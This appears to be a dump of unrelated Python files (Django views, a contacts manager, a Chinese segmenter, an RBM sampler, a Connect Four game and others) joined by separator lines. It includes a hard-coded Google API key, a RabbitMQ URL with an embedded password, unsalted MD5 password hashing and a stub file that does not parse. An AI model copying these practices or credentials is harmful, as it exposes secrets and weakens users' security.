cheese_and_crackers(amount_of_cheese, amount_of_crackers)
print("We can even do math inside too:")
cheese_and_crackers(10 + 20, 5 + 6)
print("And we can combine the two, variables and math:")
cheese_and_crackers(amount_of_cheese + 100, amount_of_crackers + 1000)
|
from django.http import HttpResponse
from django.views.generic import (
CreateView,
DetailView,
ListView,
DeleteView
)
import urllib.request
import json
from django.views import View
from django.shortcuts import render, get_object_or_404
from django.urls import reverse
from .models import Usuarios
from .form import UsuarioForm
class UsuarioListView(ListView):
    """List all Usuarios records."""
    template_name = 'lista_usuarios.html'
    # ListView re-evaluates this queryset per request (it is lazy).
    queryset = Usuarios.objects.all()
class UsuariosCreateView(CreateView):
    """Create a Usuarios record via UsuarioForm."""
    template_name = 'crear_usuarios.html'
    form_class = UsuarioForm

    def form_valid(self, form):
        # NOTE(review): this override only delegates to super() and adds
        # nothing — it could be removed.
        return super().form_valid(form)
class UsuarioGeocodificar(View):
    """Geocode every user lacking coordinates via the Google Geocoding API."""

    def get(self, request, *args, **kwargs):
        """Fill in latitude/longitude for users that have none yet.

        BUGS FIXED: the original tested ``longitud is (0 or None)`` —
        ``(0 or None)`` evaluates to ``None`` and ``is`` is an identity
        check — and ``results is []``, which is always False since ``[]``
        creates a fresh object.  Both replaced with value comparisons.
        A leftover debug print was also removed.
        """
        # SECURITY NOTE(review): the API key is hard-coded in source; move it
        # to settings / environment configuration.
        endpoint = 'https://maps.googleapis.com/maps/api/geocode/json?'
        api_key = 'AIzaSyAYVHSbEo-Rh1qBeOOk_BKiXns7bzVniyQ'
        for usuario in Usuarios.objects.all():
            # Only geocode users whose coordinates are missing (0 or None).
            if usuario.longitud in (0, None) and usuario.latitud in (0, None):
                direccion = usuario.direccion.replace(' ', '+')
                ciudad = usuario.ciudad.replace(' ', '+')
                url = endpoint + 'address=' + direccion + ',' + ciudad + '&key=' + api_key
                response = urllib.request.urlopen(url).read()
                data = json.loads(response)
                if not data['results']:
                    # Geocoding failed: flag the user instead of storing junk.
                    usuario.estadogeo = 0
                    usuario.save()
                else:
                    location = data['results'][0]['geometry']['location']
                    usuario.longitud = location['lng']
                    usuario.latitud = location['lat']
                    usuario.save()
        return HttpResponse('Exitoso!!')
class UsuariosDeleteView(DeleteView):
    """Delete a Usuarios record identified by the 'id' URL kwarg."""
    template_name = 'eliminar_usuarios.html'

    def get_object(self):
        """Return the Usuarios instance for the 'id' URL kwarg, or 404."""
        return get_object_or_404(Usuarios, id=self.kwargs.get("id"))

    def get_success_url(self):
        """After deletion, go back to the user list."""
        return reverse('lista-usuarios')
class UsuarioDetailView(DetailView):
    """Detail view for a single Usuarios record, looked up by URL kwarg 'id'."""
    template_name = 'detalles_usuarios.html'

    def get_object(self):
        """Return the Usuarios instance for the 'id' URL kwarg, or 404.

        Removed a leftover debug ``print`` of the id.
        """
        id_ = self.kwargs.get("id")
        return get_object_or_404(Usuarios, id=id_)
#-*- coding:utf8 -*-
import time
import datetime
import json
from celery.task import task
from celery import Task
from django.conf import settings
from common.utils import update_model_fields
|
from ._version import __version__
from .main import *
from .data.velocity import VelBinner
|
from model.model import Model
from view.view import View
class Controller:
    """Console MVC controller: wires the contacts/appointments Model to the View."""

    # Constructor: build the data layer (Model) and console output (View).
    def __init__(self):
        self.model = Model()
        self.view = View()

    # ---------------- Contact controllers ----------------
    def agregar_contacto(self, id_contacto, nombre, tel, correo, dir):
        """Add a contact; display it, or an 'already exists' message on failure."""
        # e: success flag, c: contact (or the conflicting one) from the model.
        e, c = self.model.agregar_contacto(id_contacto, nombre, tel, correo, dir)
        if e:
            self.view.agregar_contacto(c)
        else:
            self.view.contacto_ya_existe(c)

    def leer_contacto(self, id_contacto):
        """Look up a single contact by id and display it (or a not-found message)."""
        e, c = self.model.leer_contactos(id_contacto)
        if e:
            self.view.mostrar_contacto(c)
        else:
            self.view.contacto_no_existe(id_contacto)

    def leer_todos_contactos(self):
        """Display every contact."""
        c = self.model.leer_todos_contactos()
        self.view.mostrar_contactos(c)

    def actualizar_contacto(self, id_contacto, n_nombre = '', n_tel = '', n_correo = '', n_dir = ''):
        """Update a contact's fields; empty strings mean 'leave unchanged'."""
        e = self.model.actualizar_contacto(id_contacto, n_nombre, n_tel , n_correo , n_dir )
        if e:
            self.view.actualizar_contacto(id_contacto)
        else:
            self.view.contacto_no_existe(id_contacto)

    def borrar_contacto(self, id_contacto):
        """Delete a contact by id and report the outcome."""
        e, c = self.model.borrar_contacto(id_contacto)
        if e:
            self.view.borrar_contacto(c)
        else:
            self.view.contacto_no_existe(id_contacto)

    def leer_contactos_letra(self, letra):
        """Display all contacts matching the given letter."""
        c = self.model.leer_contactos_letra(letra)
        self.view.mostrar_contactos(c)

    # ----------------- Appointment (citas) controllers -----------------
    def agregar_cita(self, id_cita, id_contacto, lugar, fecha, hora, asunto):
        """Add an appointment; report success or failure."""
        e, c = self.model.agregar_cita(id_cita, id_contacto, lugar, fecha, hora, asunto)
        if e:
            self.view.agregar_cita(c)
        else:
            self.view.cita_no_existe(c)

    def leer_cita(self, id_cita):
        """Look up a single appointment by id and display it."""
        e, c = self.model.leer_cita(id_cita)
        if e:
            self.view.mostrar_cita(c)
        else:
            self.view.cita_no_existe(id_cita)

    def leer_todos_citas(self):
        """Display every appointment.

        NOTE(review): this calls the *contact* model/view methods — looks like
        a copy-paste bug; presumably it should call cita equivalents. Confirm
        the Model/View APIs before changing.
        """
        c = self.model.leer_todos_contactos()
        self.view.mostrar_contactos(c)

    def actualizar_Cita(self, id_cita, id_ncontacto = '', n_lugar = '', n_fecha = '', n_hora = '', n_asunto = ''):
        """Update an appointment's fields; empty strings mean 'leave unchanged'.

        NOTE(review): on success/failure this calls the *contact* view methods
        (actualizar_contacto / contacto_no_existe); likely intended the cita
        variants — confirm.
        """
        e = self.model.actualizar_Cita(id_cita, id_ncontacto, n_lugar, n_fecha, n_hora, n_asunto)
        if e:
            self.view.actualizar_contacto(id_cita)
        else:
            self.view.contacto_no_existe(id_cita)

    def borrar_cita(self, id_cita):
        """Delete an appointment by id and report the outcome."""
        e, c = self.model.borrar_cita(id_cita)
        if e:
            self.view.borrar_cita(c)
        else:
            self.view.cita_no_existe(id_cita)

    def buscar_cita(self, fecha):
        """Display the appointment(s) on the given date."""
        c = self.model.buscar_cita(fecha)
        self.view.mostrar_cita(c)

    # ---------------- General methods ----------------
    def insertar_contactos(self):
        """Seed the model with demo contacts."""
        self.agregar_contacto(1, 'Francisco Zárate', '473-162-1246', 'fm.zaratelopez@ugto.mx', 'Juan Rojas Gonzales')
        self.agregar_contacto(2, 'Carlos Canno', '464-145-1835', 'cano@hotmail.com', 'Vulcano')
        self.agregar_contacto(3, 'Jonathan Hernandez', '464-132-1235', 'jonathan@gmail.com', 'Arteaga no 6')
    '''
    def insertar_citas(self):
        self.agregar_cita(1, 1, 'Dicis', '17/02/2020', '15:30', 'Sistemas')
        self.agregar_cita(2, 2, 'Escuela', '20/11/2020', '20:30', 'NLP')
        self.agregar_cita(3, 1, 'Centro', '18/03/2020', '13:30', 'Trabajo')
    '''
    def start(self):
        """Show the welcome message, seed demo data, and list all contacts."""
        # Display a welcome message
        self.view.start()
        # Insert seed data into the model
        self.insertar_contactos()
        #self.insertar_citas()
        # Show all contacts in DB
        self.leer_todos_contactos()
        #self.leer_contactos_letra('a')

    def write_contact(self):
        """Prompt for a new contact's fields and add it."""
        id = input("ID: ")
        n = str(input("Ingrese nombre: "))
        t = str(input("Ingrese telefono: "))
        c = str(input("Ingrese correo: "))
        d = str(input("Direccion: "))
        self.agregar_contacto(id, n, t, c, d)

    def search_contacto(self):
        """Prompt for a letter and list matching contacts."""
        letra = str(input('Ingresa letra a buscar: '))
        self.leer_contactos_letra(letra)

    def delete_contacto(self):
        """Prompt for an id and delete that contact."""
        id = input("Id contacto a borrar: ")
        self.borrar_contacto(id)

    def update_contaco(self):
        """Prompt for updated contact fields (empty = keep) and apply them.

        NOTE(review): method name has a typo ('contaco'); kept because menu()
        calls it by this name.
        """
        print("Si no desea modificar alguna parte del contacto presiona enter")
        id_contacto = input("Inserte el id del contacto que desea modificar:")
        n_nombre = str(input("Inserte el nuevo nombre:"))
        n_tel = str(input("Inserte el nuevo telefono:"))
        n_correo = str(input("Inserte el nuevo correo:"))
        n_dir = str(input("Inserte el nuevo direccion:"))
        self.actualizar_contacto(id_contacto, n_nombre , n_tel , n_correo , n_dir )

    def menu(self):
        """Display the menu and dispatch the selected option (options 4-8 are unimplemented)."""
        # Display menu
        self.view.menu()
        o = input('Selecciona una opcion (1-9): ')
        if o == '1':
            self.write_contact()
        elif o == '2':
            self.search_contacto()
        elif o == '3':
            self.update_contaco()
        elif o == '4':
            pass
        elif o == '5':
            pass
        elif o == '6':
            pass
        elif o == '7':
            pass
        elif o == '8':
            pass
        elif o == '9':
            self.view.end()
        else:
            self.view.opcion_no_valida()
# -*- coding: utf-8 -*-
import mmseg
from hmm import hmm
# Punctuation (full-width and ASCII) treated as token delimiters.
PUNCS = '。《,》?/·「」:;‘’“”|、{}`~!@#¥……&×()-——=+\n'
# Latin letters: runs of these are emitted verbatim, never HMM-segmented.
ALPHA = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
# ASCII digits.
NUM = '0123456789'
# Chinese numerals and magnitude/percent characters (used to extend numbers).
HANNUM = '零一二两三四五六七八九十百千万亿兆几.%'
# Single characters that force a cut on both sides (particles, pronouns, etc.).
CUTTING = '极是比于在由从给到不没未了过着的地得这那其第来去很都刚和与及而向之乎哉也所啊吗吧啦呀么你我他上下左右又'
def special_dealing(chars, next_word):
    """Re-segment a buffered run of single-character tokens.

    Emits CUTTING characters as standalone tokens, Latin-letter runs
    verbatim, and everything else through the HMM segmenter.

    chars: list of single-character tokens buffered by main().
    next_word: the token following the run — NOTE(review): currently unused.
    Returns the list of re-segmented tokens.
    """
    result = []
    buf = []                 # characters accumulated since the last flush
    end_with_alpha = False   # True while buf holds a Latin-letter run
    def dealing(buf):
        # Flush buf through the HMM segmenter into result (no-op if empty).
        if buf != []:
            result.extend(hmm.output(''.join(buf)))
    for char in chars:
        if char in CUTTING:
            # Cut markers: flush the buffer, emit the marker on its own.
            dealing(buf)
            result.append(char)
            buf = []
        else:
            if char in ALPHA:
                if not end_with_alpha:
                    # Entering a Latin run: flush the pending CJK buffer first.
                    end_with_alpha = True
                    dealing(buf)
                    buf = []
            elif end_with_alpha:
                # Leaving a Latin run: emit it verbatim (never HMM-segmented).
                result.append(''.join(buf))
                buf = []
                end_with_alpha = False
            buf.append(char)
    # Flush the tail: Latin runs verbatim, CJK through the HMM.
    if end_with_alpha:
        result.append(''.join(buf))
    elif buf != []:
        result.extend(hmm.output(''.join(buf)))
    return result
def main(lines):
    """Post-process mmseg's segmentation of ``lines`` into a flat token list.

    Glues digit/Chinese-numeral sequences (including a decimal '点') onto the
    preceding number token, and buffers runs of isolated single characters for
    re-segmentation by special_dealing().
    """
    final = []
    for line in mmseg.main(lines):
        buf = []              # pending run of single-character tokens
        result = []
        end_with_num = False  # True when buf[-1] is a number still being extended
        for word in line:
            if end_with_num:
                # Absorb leading numeric characters of this word into buf[-1].
                i = 0
                while i < len(word):
                    if word[i] in HANNUM or word[i] in NUM or word[i] == '点':
                        buf[-1] += word[i]
                        i += 1
                    else:
                        break
                if i < len(word):
                    # Non-numeric remainder: the number is finished.
                    result.extend(buf)
                    result.append(word[i:])
                    buf = []
                    end_with_num = False
            elif len(word) == 1 and word not in PUNCS and word not in NUM and word not in HANNUM:
                # Isolated single character: buffer it for re-segmentation.
                buf.append(word)
            else:
                # Flush the buffer: short runs pass through, longer runs are
                # re-segmented by special_dealing().
                if len(buf) <= 1:
                    result.extend(buf)
                else:
                    result.extend(special_dealing(buf, word))
                buf = []
                if len(word) == 1 and (word in NUM or word in HANNUM):
                    # A single digit/numeral starts a number to be extended.
                    end_with_num = True
                    buf.append(word)
                else:
                    result.append(word)
        # End of line: flush whatever is still buffered.
        if len(buf) <= 1:
            result.extend(buf)
        else:
            result.extend(special_dealing(buf, word))
        final.extend(result)
    return final
def test():
    """Segment the demo file and print the tokens space-separated.

    Uses a context manager so the file handle is closed promptly (the
    original left it to the garbage collector).
    """
    with open("input.txt", encoding="utf-8") as f:
        text = f.read()
    print(' '.join(main(text)))
if __name__ == '__main__':
    test()
|
from django.contrib.auth.models import AbstractUser
from django.db import models
from products.models import Product, Category
from address.models import Address
# from computations.models import CostCalc, DiscountCalc
# from values.models import SellQuantity
class CustomUser(AbstractUser):
    """Custom user model with Russian-labelled name fields."""
    # NOTE(review): the verbose_name labels look shifted — 'Фамилия' (surname)
    # sits on middle_name and 'Отчество' (patronymic) on last_name; confirm
    # the intended field-to-label mapping.
    first_name = models.CharField(max_length=55, verbose_name='Имя')
    middle_name = models.CharField(max_length=55, verbose_name='Фамилия')
    last_name = models.CharField(max_length=55, verbose_name='Отчество')
    # FIXME: this is a mess and will need reworking (translated from Russian)
    # sell_quantity = models.ForeignKey(SellQuantity, on_delete=models.CASCADE)

    def __str__(self):
        # email is inherited from AbstractUser.
        return self.email
class Profile(models.Model):
    """Per-user profile holding contact, address, and purchasing data."""
    user = models.OneToOneField(CustomUser, on_delete=models.CASCADE)
    # NOTE(review): SmallIntegerField cannot hold real phone numbers
    # (max 32767); a CharField is the usual choice — requires a migration.
    phone = models.SmallIntegerField(blank=True, null=True,
                                     verbose_name='Номер телефона')
    address = models.ForeignKey(Address, on_delete=models.CASCADE)
    products = models.ForeignKey(Product, on_delete=models.SET_NULL,
                                 null=True, verbose_name='Продукт')
    category = models.ForeignKey(Category, on_delete=models.SET_NULL,
                                 null=True, verbose_name='Категория')
    sell_quantity = models.DecimalField(max_digits=5, decimal_places=2,
                                        verbose_name='Кол-во продукции')

    def __str__(self):
        return str(self.phone)

    class Meta:
        # unique_together = ['user', 'profile']
        verbose_name = 'Профиль'
        verbose_name_plural = 'Профили'
|
#!/usr/bin/env python
from oslo_config import cfg
import oslo_messaging
import json
import sys
import logging
__author__ = 'Yuvv'
def send_msg(pub_id, e_type, content):
    """Publish an INFO notification on the 'DR' topic via oslo.messaging.

    pub_id: publisher id; e_type: event type string; content: payload.

    SECURITY NOTE(review): the rabbit URL embeds credentials in source code;
    move them to configuration.
    """
    transport = oslo_messaging.get_transport(
        cfg.CONF,
        'rabbit://openstack:yuvv@controller:5672')
    notifier = oslo_messaging.Notifier(transport,
                                       driver='messaging',
                                       topic='DR')
    notifier2 = notifier.prepare(publisher_id=pub_id)
    notifier2.info(ctxt={},
                   event_type=e_type,
                   payload=content)
if __name__ == '__main__':
    logging.basicConfig(filename='/var/log/mylog/sender.log', filemode='a',
                        level=logging.INFO,
                        format='%(asctime)s %(levelname)s: %(message)s',
                        datefmt='%m/%d/%Y %I:%M:%S %p')
    # Expect exactly one argument: a JSON object with pubid/etype/content.
    if len(sys.argv) == 2:
        try:
            msg = json.loads(sys.argv[1])
            logging.info('Get a msg of type %s from %s', msg['etype'], msg['pubid'])
            send_msg(msg['pubid'],
                     msg['etype'],
                     msg['content'])
            logging.info('Send msg OK!')
        except Exception:
            # BUG FIXED: the original logged e.message, which does not exist
            # on Python 3 exceptions; logging.exception records the traceback.
            logging.exception('Failed to send message')
    else:
        logging.info('Arguments number wrong! Message doesn\'t send.')
'''
python mysend.py '{"pubid":"glance","etype":"delete","content":{"image_id":"1d16c432-1690-49a1-bdfc-4c51438f44f8","value":"file:///var/lib/glance/images/1d16c432-1690-49a1-bdfc-4c51438f44f8"}}'
''' |
"""GeoPySpark package constants."""
from os import path
"""GeoPySpark version."""
VERSION = '0.3.0'
"""Backend jar name."""
JAR = 'geotrellis-backend-assembly-' + VERSION + '.jar'
"""The current location of this file."""
CWD = path.abspath(path.dirname(__file__))
|
# para el próximo día: encapsulamos código
def desglose(total, tipo_iva):
    """Print the VAT breakdown of `total`: taxable base, VAT amount,
    and the recomputed total, each rounded to cents."""
    factor = 1 + tipo_iva / 100
    base = round(total / factor, 2)
    print(base)
    print('+', round(base * tipo_iva / 100, 2), sep='')
    print('-----')
    print(round(base * factor, 2))
desglose(100,7)
'''
100
+21
---
121
'''
'''
n=3
for i in range(n):
print(i)
'''
'''
for j in range(1,11):
print('Tabla del ',j)
for i in range(1,11):
if i!=5:
print(j,' x ',i,' = ',j*i)
''' |
# Python Weibo crawler (scrapes high-profile Weibo stock accounts).
# NOTE(review): unfinished stub — the bare `class` statement below is a
# syntax error; the crawler implementation was never written.
class
|
from lxml import html
import cssselect
import glob
import sys
link_list = glob.glob("./www.allitebooks.org/*")
for filename in link_list:
try:
content = open(filename).read()
tree = html.fromstring(content)
except UnicodeError:
print("error: " + filename)
continue
except:
print("Unexpected error:", sys.exc_info()[0])
pass
hrefs = tree.cssselect('span.download-links a')
for href in hrefs:
print(href.attrib['href'])
|
'''
File: boltz_mnist_sample.py
Author: Hadayat Seddiqi
Date: 03.22.15
Description: Sample trained restricted Boltzmann machine using CD.
'''
import numpy as np
import scipy.io as sio
import matplotlib
import matplotlib.pyplot as plt
import cPickle as pk
import boltzhad.boltzmann as boltz
from boltzhad.utils import tile_raster_images
import matplotlib.animation as anim
import PIL.Image as Image
# def logit(x):
# x[np.where(np.abs(x) < 30)[0]] = 1.0/(1.0 + np.exp(-x[np.abs(x) < 30]))
# x[x > 30] = 1
# x[x < -30] = 0
# return x
def logit(x):
    """Logistic sigmoid: map x elementwise into (0, 1)."""
    return 1.0 / (np.exp(-x) + 1.0)
# --- Sampling configuration (Python 2 script: uses xrange) ---
classes = range(10)        # MNIST digit classes to sample from
nperclass = 1              # test images taken per class
kupdown = 100              # Gibbs up-down sweeps per starting image
nhidrow, nhidcol = 8, 28   # hidden layer laid out as an 8x28 grid for display
# sample a test image
d = sio.loadmat('figs_boltz_mnist/model.mat')
W = d['w']                 # weights: visible (784) x hidden
# vbias = np.zeros((784, 1))
# hbias = np.zeros((nhidrow*nhidcol, 1))
vbias = d['v']             # visible biases
hbias = d['h']             # hidden biases
# training data
datamat = sio.loadmat('data/mnist_all.mat')
# construct list of training vecs for each class
dtest = np.vstack([ datamat['test'+str(d)][:nperclass]
                    for d in classes ]).astype(np.float)
# normalize pixel values into [0, 1]
dtest /= float(255)
# train, valid, test = pk.load(open('mnist.pkl','rb'))
# data = valid
# idxsort = np.argsort(data[1])
pstates = []  # animation frames (lists of artists)
# joint state vector: visible units first (784), then hidden units
state = np.zeros((784+nhidrow*nhidcol, 1))
fig, ax = plt.subplots(2, 2)
# remove annoying axes
for rax in ax:
    for kax in rax:
        kax.get_xaxis().set_visible(False)
        kax.get_yaxis().set_visible(False)
# loop over inputs we're going to start with
for itr in xrange(nperclass*len(classes)):
    # get test vector and clamp it onto the visible units
    state[:784] = dtest[itr].reshape(784, 1)
    state[784:] = logit(np.dot(W.T, state[:784]) + hbias)
    # plot the starting visible/hidden configuration (top row, static)
    pvinp = ax[0,0].matshow(1-state[:784].reshape(28,28), cmap='Greys')
    phinp = ax[0,1].matshow(1-state[784:].reshape(nhidrow, nhidcol), cmap='Greys')
    # pvis = ax[1,0].matshow(1-state[:784].reshape(28,28), cmap='Greys')
    # phid = ax[1,1].matshow(1-state[784:].reshape(nhidrow, nhidcol), cmap='Greys')
    # animated plot: alternate hidden/visible stochastic updates (Gibbs sampling)
    for k in xrange(kupdown):
        hact = logit(np.dot(W.T, state[:784]) + hbias)
        state[784:] = hact > np.random.rand(nhidrow*nhidcol, 1)
        vact = logit(np.dot(W, state[784:]) + vbias)
        state[:784] = vact > np.random.rand(784, 1)
        ptitle = ax[1,1].text(0.5, 1.1, "%i Gibbs samples" % k,
                              horizontalalignment='center',
                              verticalalignment='bottom',
                              fontsize=16,
                              fontweight='bold',
                              transform=ax[1,1].transAxes)
        # pvis = ax[1,0].matshow(1-state[:784].reshape(28,28), cmap='Greys')
        # phid = ax[1,1].matshow(1-state[784:].reshape(nhidrow, nhidcol), cmap='Greys')
        pvis = ax[1,0].matshow(1-vact.reshape(28,28), cmap='Greys')
        phid = ax[1,1].matshow(1-hact.reshape(nhidrow, nhidcol), cmap='Greys')
        pstates.append([ptitle, pvis, phid, pvinp, phinp])
ani = anim.ArtistAnimation(fig, pstates, interval=50, blit=False)
print("Saving...")
ani.save('figs_boltz_mnist/samples_animation.gif', writer='imagemagick', fps=30)
print("Saving done.")
plt.show()
|
from blocks.bricks import Identity, Logistic, MLP
from blocks.initialization import Uniform, Constant
from math import sqrt
from theano import tensor
class Autoencoder(MLP):
    """Single-hidden-layer autoencoder: logistic encoder, linear decoder."""

    def __init__(self, ninput, nhidden):
        # Glorot/Xavier-style uniform initialization bound.
        bound = sqrt(6) / sqrt(nhidden + ninput + 1)
        super(Autoencoder, self).__init__(
            activations=[Logistic(), Identity()],
            dims=[ninput, nhidden, ninput],
            weights_init=Uniform(width=bound),
            biases_init=Constant(0))
def sparsity_regularizer(h, rho, beta):
    """KL-divergence sparsity penalty on hidden activations ``h``.

    rho is the target mean activation, beta the penalty weight.
    Returns beta times the summed KL(rho || mean |h|) over hidden units.
    """
    p_hat = tensor.abs_(h).mean(axis=0)
    kl_on = rho * tensor.log(rho / p_hat)
    kl_off = (1 - rho) * tensor.log((1 - rho) / (1 - p_hat))
    return beta * (kl_on + kl_off).sum()
|
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
    """Iterative binary-tree postorder traversal using the two-stack technique."""

    def postorderTraversal(self, root):
        """Return node values in postorder (left, right, root).

        :type root: TreeNode
        :rtype: List[int]

        BUG FIXED: the original returned None for an empty tree; an empty
        list matches the declared List[int] return type.
        """
        if root is None:
            return []
        stack1 = [root]
        stack2 = []
        # stack1 pops nodes in root-right-left order; pushing each onto
        # stack2 reverses that into left-right-root, i.e. postorder.
        while stack1:
            node = stack1.pop()
            stack2.append(node)
            if node.left is not None:
                stack1.append(node.left)
            if node.right is not None:
                stack1.append(node.right)
        output = []
        while stack2:
            output.append(stack2.pop().val)
        return output
|
# Paths where extracted HOG features are stored (train pos/neg, test pos/neg).
pos_fd_path = 'data/pos_fd'
neg_fd_path = 'data/neg_fd'
pos_fd_test_path = 'data/pos_test'
neg_fd_test_path = 'data/neg_test'
# Path where the trained classifier is pickled.
model_path = 'data/model/car_detector_model.pkl'
# Sliding window parameters: window size (pixels) and stride per step.
(win_width, win_height) = (100, 40)
step_size = 10
# HOG descriptor parameters — presumably for skimage.feature.hog
# (British spellings 'visualise'/'normalise'); confirm against the consumer.
orientations = 9
pixels_per_cell = (8, 8)
cells_per_block = (3, 3)
visualise = False
normalise = True
# Factor by which the image shrinks at each pyramid level.
scale_amt = 1.25
# Overlap threshold for non-maximum suppression.
overlap_thresh = 0.2
|
import hashlib
def verify(username, password):
    """Return True iff (username, password) matches a line in known_users.

    Each record is "name|||md5hex"; the candidate password is hashed and
    compared against the stored digest.  Uses a context manager so the file
    handle is closed promptly (the original leaked it).
    """
    with open("known_users") as fh:
        credentials = fh.readlines()
    for user in credentials:
        fields = user.strip().split("|||")
        if fields[0] == username and fields[1] == password_hash(password):
            return True
    return False
def username_hash(username):
    """Obfuscate a username: XOR each char code with a magic number,
    join the decimal values with underscores (reversible; see username_dehash)."""
    return "_".join(str(ord(ch) ^ 0xC0FFEE) for ch in username)
def password_hash(password):
    """Return the hex MD5 digest of the password.

    Encodes to UTF-8 first so this works on Python 3 as well (the original
    passed a str straight to update(), which raises TypeError on Python 3).

    SECURITY NOTE(review): unsalted MD5 is unsuitable for real password
    storage — prefer hashlib.pbkdf2_hmac or a dedicated KDF.
    """
    digest = hashlib.md5()
    digest.update(password.encode('utf-8'))
    return digest.hexdigest()
def username_dehash(username):
    """Invert username_hash: split on '_', XOR each value back to a char."""
    return "".join(chr(int(token) ^ 0xC0FFEE) for token in username.split("_"))
if __name__ == "__main__":
if str(raw_input("Add user? ")) == "YES":
username = str(raw_input("New username: "))
password = str(raw_input("New password: "))
f = open("known_users", 'a')
f.write(username + "|||" + password_hash(password) + "\n")
f.close()
# TO REMOVE DUPLICATE INSTANCES OF USERS
# RUN THE FOLLOWING SHELL COMMANDS
# sort -u known_users | while read line; do echo $line >> known_users_2; done
# mv known_users_2 known_users
|
import os
from collections import defaultdict
import numpy as np
from PIL import Image
import cv2
from torch.utils import data
class PRIDDataset(data.Dataset):
    """Person re-identification dataset.

    Training mode: ``targets`` is a list of dataset names; all images under
    each target directory are indexed.  Evaluation mode: ``targets`` is a
    single name whose probe/gallery split files are also loaded.

    NOTE(review): image file names are assumed to look like
    ``<prefix>_<personid>_<...>_<cameraid>_...`` (fields 1 and 3 of the
    '_'-split) — confirm against the actual dataset layout.
    """
    img_directory = 'images'            # subdir holding per-target image folders
    list_directory = 'lists'            # subdir holding probe/gallery list files
    probe_list_footer = 'probe'         # substring marking probe list files
    gallery_list_footer = 'gallery'     # substring marking gallery list files

    def __init__(self, root_path, targets):
        """Index images (and, for a single str target, probe/gallery splits)."""
        # When the class is used for trainig, "targets" must be list,
        # otherwise "targets" must be str
        assert type(targets) == list or type(targets) == str
        if type(targets) is str:
            # Evaluation mode: load every probe/gallery split for this target.
            self.name = targets
            probe_list_files = [list_file for list_file in os.listdir(
                os.path.join(root_path, self.list_directory)
            ) if targets in list_file and self.probe_list_footer in list_file]
            gallery_list_files = [list_file for list_file in os.listdir(
                os.path.join(root_path, self.list_directory)
            ) if targets in list_file and self.gallery_list_footer in list_file]
            # Splits must come in probe/gallery pairs.
            assert len(probe_list_files) == len(gallery_list_files)
            probe_list_files.sort()
            gallery_list_files.sort()
            probe_files_for_all_sets = []
            gallery_files_for_all_sets = []
            for probe_list_file, gallery_list_file in zip(probe_list_files, gallery_list_files):
                with open(os.path.join(root_path, self.list_directory, probe_list_file)) as f:
                    probe_files_for_all_sets.append([line.rstrip('\n') for line in f.readlines()])
                with open(os.path.join(root_path, self.list_directory, gallery_list_file)) as f:
                    gallery_files_for_all_sets.append([line.rstrip('\n') for line in f.readlines()])
            self.probe_indices_for_all_sets = [[] for _ in range(len(probe_list_files))]
            self.gallery_indices_for_all_sets = [[] for _ in range(len(gallery_list_files))]
            # Normalize to a one-element list so the indexing loop below is shared.
            targets = [targets]
        self.img_files = []        # absolute path per image
        self.identity_labels = []  # dense class id per image
        self.camera_labels = []    # camera id per image
        self.class_n_imgs = []     # image count per class
        class_map = {}             # "<target>_<personid>" -> dense class id
        self.n_classes = 0
        for target in targets:
            img_files = os.listdir(os.path.join(root_path, self.img_directory, target))
            img_files.sort()
            for img_file in img_files:
                self.img_files.append(os.path.join(root_path, self.img_directory, target, img_file))
                idx = img_file.split('_')[1]
                class_name = target + '_' + idx
                if class_name not in class_map:
                    # First sighting of this identity: assign the next class id.
                    class_map[class_name] = self.n_classes
                    self.n_classes += 1
                    self.class_n_imgs.append(0)
                self.identity_labels.append(class_map[class_name])
                camera_id = int(img_file.split('_')[3])
                self.camera_labels.append(camera_id)
                self.class_n_imgs[class_map[class_name]] += 1
                # Only present in evaluation mode (str target branch above).
                if hasattr(self, 'probe_indices_for_all_sets'):
                    for probe_files, gallery_files, probe_indices, gallery_indices in zip(
                        probe_files_for_all_sets, gallery_files_for_all_sets,
                        self.probe_indices_for_all_sets, self.gallery_indices_for_all_sets
                    ):
                        # A file may be in the probe OR the gallery set, not both.
                        assert not (img_file in probe_files and img_file in gallery_files)
                        if img_file in probe_files:
                            probe_indices.append(len(self.img_files)-1)
                        elif img_file in gallery_files:
                            gallery_indices.append(len(self.img_files)-1)
        self.class_n_imgs = np.array(self.class_n_imgs)

    def __len__(self):
        """Number of indexed images."""
        return len(self.img_files)

    def __getitem__(self, idx):
        """Return (PIL image, identity label, camera label) for index ``idx``."""
        img = Image.open(self.img_files[idx])
        identity_label = self.identity_labels[idx]
        camera_label = self.camera_labels[idx]
        return img, identity_label, camera_label

    def get_test_set(self):
        """Yield (probe_indices, gallery_indices) per evaluation split.

        Only meaningful in evaluation mode (str target).
        """
        for probe_indices, gallery_indices in zip(
            self.probe_indices_for_all_sets, self.gallery_indices_for_all_sets
        ):
            yield probe_indices, gallery_indices
|
#Eric Ayllon Palazon
import random
def construir_tablero():
    """Ask the user for n and return an empty n x n board plus n."""
    n = input("Introduce n:")
    # One fresh row of zeros per board row.
    tablero = [[0] * n for _ in range(n)]
    return tablero, n
def mostrar_tablero(tablero):
    """Print the board to the console with ASCII cell borders (Python 2)."""
    for fila in tablero:
        # Top border of the row.
        print "",
        for i in range(len(fila)):
            print "-"*3, " ",
        print ""
        # Cell contents: 0 -> blank, 1 -> X, anything else -> O.
        for celda in fila:
            print "|",
            if celda == 0:
                print " ",
            elif celda == 1:
                print "X",
            else:
                print "O",
            print "|",
        print ""
        # Bottom border of the row.
        print "",
        for i in range(len(fila)):
            print "-"*3, " ",
        print ""
    # si multiplico un caracter o un string por x, el resultado es x veces el texto multiplicado
# si multiplico un caracter o un string por x, el resultado es x veces el texto multiplicado
def tirar_ficha(tablero, columna, jugador):
    """Drop `jugador`'s piece into `columna`; return (board, move_was_valid)."""
    col = get_columna(tablero, columna)
    col = col[::-1] # reversed so col.index(0) finds the lowest empty cell
    valida = True
    try: # check whether the column still has room
        posicion_valida = len(col) - (col.index(0)+1)
    except ValueError: # column is full: index(0) raises instead of returning an int
        print "No puedes tirar en esa columna"
        valida = False
    else:
        tablero[posicion_valida][columna] = jugador # place the piece
    return tablero, valida
def get_columna(tablero, columna):
    """Return column `columna` of the board as a list, top to bottom."""
    return [fila[columna] for fila in tablero]
def jugada(tablero, njugada, n):
    """Play one turn: even turns are the human (player 1), odd the computer."""
    if njugada%2 == 0:
        jugador = 1
        # Human enters a 1-based column, shifted to 0-based here.
        columna = input("Jugador {0} elige columna:".format(jugador))-1
    else:
        jugador = 2
